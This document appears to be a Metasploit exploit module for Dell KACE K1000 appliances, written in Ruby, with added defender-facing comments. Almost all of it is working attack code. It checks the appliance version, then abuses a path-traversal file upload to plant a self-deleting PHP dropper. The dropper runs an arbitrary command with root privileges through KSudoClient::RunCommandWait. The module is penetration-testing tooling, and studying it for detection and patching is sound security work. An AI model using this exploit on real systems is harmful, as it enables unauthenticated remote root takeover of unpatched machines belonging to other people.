GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/http/dell_kace_k1000_upload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
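class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Module metadata: affected versions, payload constraints and references.
  # Everything here is static update_info data; nothing runs until +check+
  # or +exploit+ is invoked.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dell KACE K1000 File Upload',
        'Description' => %q{
          This module exploits a file upload vulnerability in Kace K1000
          versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.90547
          which allows unauthenticated users to execute arbitrary commands
          under the context of the 'www' user.

          This module also abuses the 'KSudoClient::RunCommandWait' function
          to gain root privileges.

          This module has been tested successfully with Dell KACE K1000
          version 5.3.
        },
        'License' => MSF_LICENSE,
        'Privileged' => true,
        'Platform' => 'unix', # FreeBSD
        'Arch' => ARCH_CMD,
        'Author' => [
          'Bradley Austin (steponequit)', # Initial discovery and exploit
          'bcoles', # Metasploit
        ],
        'References' => [
          ['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']
        ],
        'Payload' => {
          'Space' => 1024,
          # 0x27 (single quote) would terminate the single-quoted PHP string
          # that +exploit+ embeds the command in; NUL is excluded alongside it.
          'BadChars' => "\x00\x27",
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl'
          }
        },
        'DefaultTarget' => 0,
        'Targets' => [
          ['Automatic Targeting', { 'auto' => true }]
        ],
        'DisclosureDate' => '2014-03-07',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Fingerprints the appliance from the response headers of a bare GET to
  # service/kbot_upload.php (expected: HTTP 500 plus the X-DellKACE-Appliance
  # and X-DellKACE-Version headers) and compares the version against the
  # ranges listed in the description.
  #
  # @return [Exploit::CheckCode] Unknown when the host does not answer,
  #   Detected when it is a K1000 whose version header does not parse,
  #   Vulnerable or Safe otherwise.
  def check
    res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))
    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end

    # A non-KACE host that happens to answer 500 sends no X-DellKACE-* headers;
    # the original called .downcase on the missing header and raised
    # NoMethodError instead of returning a CheckCode.
    appliance = res.headers['X-DellKACE-Appliance']
    return Exploit::CheckCode::Safe unless res.code == 500 && appliance&.downcase == 'k1000'

    version = res.headers['X-DellKACE-Version'].to_s
    match = version.match(/\A([0-9])\.([0-9])\.([0-9]+)\z/)
    return Exploit::CheckCode::Detected unless match

    vprint_status("Found Dell KACE K1000 version #{version}")
    major, minor, build = match.captures.map(&:to_i)

    # NOTE(review): the description says 5.4 "prior to 5.4.76849" and 5.5
    # "prior to 5.5.90547", yet both comparisons below use <=, so the first
    # fixed build would be reported Vulnerable. Kept as the original had it;
    # confirm the intended boundary before tightening to <.
    vulnerable =
      (major == 5 && minor <= 3) ||                   # 5.0 to 5.3
      (major == 5 && minor == 4 && build <= 76849) || # 5.4 prior to 5.4.76849
      (major == 5 && minor == 5 && build <= 90547)    # 5.5 prior to 5.5.90547

    vulnerable ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
  end

  # Uploads a PHP dropper into the appliance's web-served tmp directory and
  # then requests it so the web server executes it.
  #
  # Defender-facing notes, all taken from the request built below:
  # * the on-disk artifact is a dot-prefixed .php file under
  #   /kbox/kboxwww/tmp/; the dropper removes it ('rm ...') before running
  #   the payload, so it is short-lived and easy to miss in file audits;
  # * the POST to service/kbot_upload.php carries '../' sequences in the
  #   machineId parameter and a literal checksum=SCRAMBLE, both unusual enough
  #   to serve as log signatures for this technique.
  #
  # Aborts through fail_with on connection failure or an unexpected HTTP
  # status.
  def exploit
    # upload payload
    fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"
    payload_path = "/kbox/kboxwww/tmp/"
    # Dropper deletes itself, then hands the encoded command to
    # KSudoClient::RunCommandWait (the privilege-escalation path from the
    # description).
    post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"
    print_status("Uploading #{fname} (#{post_data.length} bytes)")
    # Query parameter order is shuffled per run; the values other than
    # filename/machineId/checksum are random filler.
    res = send_request_cgi(
      'uri' => normalize_uri('service', 'kbot_upload.php'),
      'method' => 'POST',
      'vars_get' => Hash[{
        'filename' => fname,
        'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",
        'checksum' => 'SCRAMBLE',
        'mac' => rand_text_alphanumeric(rand(8) + 5),
        'kbotId' => rand_text_alphanumeric(rand(8) + 5),
        'version' => rand_text_alphanumeric(rand(8) + 5),
        'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5)
      }.to_a.shuffle],
      'data' => post_data
    )

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    if res.code && res.code == 200
      print_good('Payload uploaded successfully')
    else
      fail_with(Failure::UnexpectedReply, 'Unable to upload payload')
    end

    # execute payload
    res = send_request_cgi('uri' => normalize_uri('tmp', fname))

    unless res
      fail_with(Failure::Unreachable, 'Connection failed')
    end

    # 404 here means the upload did not land where expected (not vulnerable /
    # different layout); any other non-200 status is treated as an unexpected reply.
    if res.code && res.code == 200
      print_good('Payload executed successfully')
    elsif res.code && res.code == 404
      fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")
    else
      fail_with(Failure::UnexpectedReply, 'Unable to execute payload')
    end
  end
end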